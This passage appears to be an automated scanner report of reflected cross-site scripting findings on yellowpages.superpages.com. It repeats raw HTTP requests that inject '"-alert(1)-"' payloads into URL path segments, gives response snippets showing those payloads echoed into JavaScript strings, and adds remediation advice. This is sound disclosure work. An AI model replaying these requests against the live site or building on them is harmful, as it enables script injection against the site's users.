GET /common/css6cec5"-alert(1)-"d776eed8f91/typography.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c512b"-alert(1)-"208ebd640d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/typography.cssc512b"-alert(1)-"208ebd640d3 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1603f"-alert(1)-"7b40bab0d58 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common1603f"-alert(1)-"7b40bab0d58/js/alertcommon.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20813"-alert(1)-"42f38a119fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js20813"-alert(1)-"42f38a119fb/alertcommon.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c615e"-alert(1)-"fd5addf1395 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/alertcommon.jsc615e"-alert(1)-"fd5addf1395 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bae19"-alert(1)-"9957299e054 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonbae19"-alert(1)-"9957299e054/js/browser_check.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67314"-alert(1)-"4d0383f1bcf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js67314"-alert(1)-"4d0383f1bcf/browser_check.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4823"-alert(1)-"6b96276b57d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/browser_check.jsb4823"-alert(1)-"6b96276b57d HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa65f"-alert(1)-"34ef4e6041c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonaa65f"-alert(1)-"34ef4e6041c/js/iepopup.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7547e"-alert(1)-"e77ecaba831 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js7547e"-alert(1)-"e77ecaba831/iepopup.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57121"-alert(1)-"a019059d18b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/iepopup.js57121"-alert(1)-"a019059d18b HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12235"-alert(1)-"2aa4880554e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common12235"-alert(1)-"2aa4880554e/js/jquery-1.4.2.min.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e853"-alert(1)-"4df34621227 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js6e853"-alert(1)-"4df34621227/jquery-1.4.2.min.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c940"-alert(1)-"8d600cbb5e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery-1.4.2.min.js4c940"-alert(1)-"8d600cbb5e6 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4138"-alert(1)-"d392b5225e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonf4138"-alert(1)-"d392b5225e3/js/jquery-plugins.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc582"-alert(1)-"51b3ea3bf60 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsdc582"-alert(1)-"51b3ea3bf60/jquery-plugins.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce99"-alert(1)-"1f8bcc299d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery-plugins.jsfce99"-alert(1)-"1f8bcc299d1 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39dde"-alert(1)-"ad48974274b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common39dde"-alert(1)-"ad48974274b/js/jquery.history_remote.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
...[SNIP]... erv = 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/common39dde"-alert(1)-"ad48974274b/js/jquery.history_remote.js?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c965f"-alert(1)-"9b53f386972 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsc965f"-alert(1)-"9b53f386972/jquery.history_remote.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
...[SNIP]... = 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/common/jsc965f"-alert(1)-"9b53f386972/jquery.history_remote.js?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfa09"-alert(1)-"556c143ae67 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery.history_remote.jsdfa09"-alert(1)-"556c143ae67 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
var actualUrl = "http://yellowpages.superpages.com/common/js/jquery.history_remote.jsdfa09"-alert(1)-"556c143ae67?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7dc5"-alert(1)-"f36372d39f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commond7dc5"-alert(1)-"f36372d39f5/js/jquery.sptabs.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c12c"-alert(1)-"1659686fb48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js2c12c"-alert(1)-"1659686fb48/jquery.sptabs.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc50d"-alert(1)-"069a0f815e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery.sptabs.jsfc50d"-alert(1)-"069a0f815e6 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a2a7"-alert(1)-"fc51b2a718c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common9a2a7"-alert(1)-"fc51b2a718c/js/omniture_onclick.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48ee7"-alert(1)-"7ec2f5075e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js48ee7"-alert(1)-"7ec2f5075e8/omniture_onclick.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df457"-alert(1)-"a7b7f4d7dfe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
